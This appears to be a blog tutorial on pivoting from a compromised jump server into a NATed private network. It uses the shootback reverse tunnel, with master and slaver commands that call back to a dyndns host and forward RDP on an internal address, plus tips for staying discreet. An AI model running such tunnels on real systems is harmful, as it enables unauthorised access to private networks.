Thursday, December 5, 2019

Pentesting servers behind NAT | Reverse RDP Windows | Reverse SSH

Written by   on   with No comments

Good day viewers,

Today i brought another interesting scenario on pentesting servers which are behind NAT or Windows Reverse RDP/SSH in lamen words connecting to windows/linux/xxxxx servers via RDP/SSH/TCP/UDP which are behind NAT.

in r/explainlikeimfive words

Imagine you are auditing / pentesting a server and you found a RCE on the server, unfortunately the server is just a bastion / jump server and there are application servers behind the jump server which are on private network and not exposed to public network. You need to find a way to audit the application servers listening on private network or you want to connect to these servers via SSH / RDP / TCP / UDP. How do we achieve that ? Yes I know there are number of ways to connect to these so let me explain you one way which i found was easy.

I tried many different netcat scenarios routing ports internally connecting via socat etc., without any luck.
I tried to do reverse SSH tunnel using plink, but here we have to expose our ssh username and password on the target pc, which i would never recommend this in pentesting if you want to be discrete.

Finally, I found what i was looking for "a reverse TCP tunnel which let you access target behind NAT or firewall" - shootback 

It works fairly simple when you cannot directly connect to private networks directly it will let private networks connect back to you via jumpserver.



Your Machine


Syntax

python3 master.py -m <YOUR IP ADDRESS>:<YOUR_LISTEN_PORT> -c <YOUR IP ADDRESS>:<YOUR_LISTEN_PORT_REDIRECTED_PORT>

Example
python3 master.py -m 0.0.0.0:9999 -c 0.0.0.0:7676


On JumpServer / Target Machine

Syntax

python.exe slaver.py -m <YOUR_PUBLIC_IP or DYNAMIC DNS>:<YOUR_LISTEN_PORT> -t <TARGET_APPLICATION_IP_ADDRESS>:<TARGET_APPLICATION_PORT>

Example
python.exe slaver.py -m thisisexample.dyndns.com:9999 -t 10.30.11.54:3389


Once you run the above command you will see the connection being established to your listening machine


Now we see the connection is being forwarded to 7676 port, we should be able to connect to our local ip address on the port 7676




Voila!!! here it is i am connected to the private network behind a load balancer / NAT via jumpserver



Tip: If the target system doesn't have python you can always upload a portable python zip file and extract it, use your creativity.

Disclaimer: This is strictly for educational purposes only, please use this responsibly. 

Cheers. 



Share:

0 comments:

Post a Comment